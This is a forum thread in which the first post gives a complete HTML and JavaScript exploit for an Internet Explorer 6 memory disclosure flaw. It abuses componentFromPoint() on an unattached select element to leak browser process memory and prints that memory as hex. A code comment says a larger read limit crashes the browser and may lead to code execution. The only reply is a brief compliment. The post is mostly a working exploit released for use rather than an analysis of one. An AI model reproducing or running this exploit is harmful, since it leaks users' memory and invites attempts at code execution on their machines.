Results 1 to 2 of 2

Thread: IE6 Memory Disclosure Exploit ..."vinnu" Share/Save - My123World.Com!

  1. #1

    IE6 Memory Disclosure Exploit ..."vinnu"

    <!---
    Author : "vinnu"
    Team : Legion Of Xtremers
    Thanx : Secfence
    Greets : Lord Deathstorm, prashant, b0nd, 41.warrior, fb1h2s, godwin austin, neo, amol, umesh, anarki, the-empty, DZZ, webDevil and all g4h members, and whole security world.
    --->
    <html>
    <head>
    <title>IE 6 Memory disclosure exploit..."vinnu"</title>
    </head>
    <body>
    <div id="disc"></div>
    <script>
    var limit = 8000;// Above it will crash and may lead to Code Execution.
    var did = document.getElementById("disc");
    function discl() {
    var buf="";
    var c="0000";
    var d=0x0000;
    /************************************************** **/
    var a=document.createElement("select");
    var b=a.componentFromPoint(0xff,0xff);
    /*** Vulnerable code. componentFromPoint() on an
    unmaterialised object leads to leaking in memory. ***/

    did.innerHTML+="<br>Object.length : "+b.length;
    buf="<table><tr>";
    for(var i=0;i<limit;i++) {
    d = b.charCodeAt(i).toString(16);
    buf+="<td>"+c.substring(0,4-d.toString().length)+d+"</td>";
    if(i%16==0){buf+="</tr><tr>"}
    }buf+="</tr></table>";
    did.innerHTML += buf;
    }
    </script>
    <input type=button value="Disclose" onclick="discl()" />
    </body>
    </html>
    Last edited by "vinnu"; 10-20-2011 at 04:42 PM.

  2. #2
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    aaah this is what you told me during the meet...
    awesome sirji...
    need to check and analyze it...

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •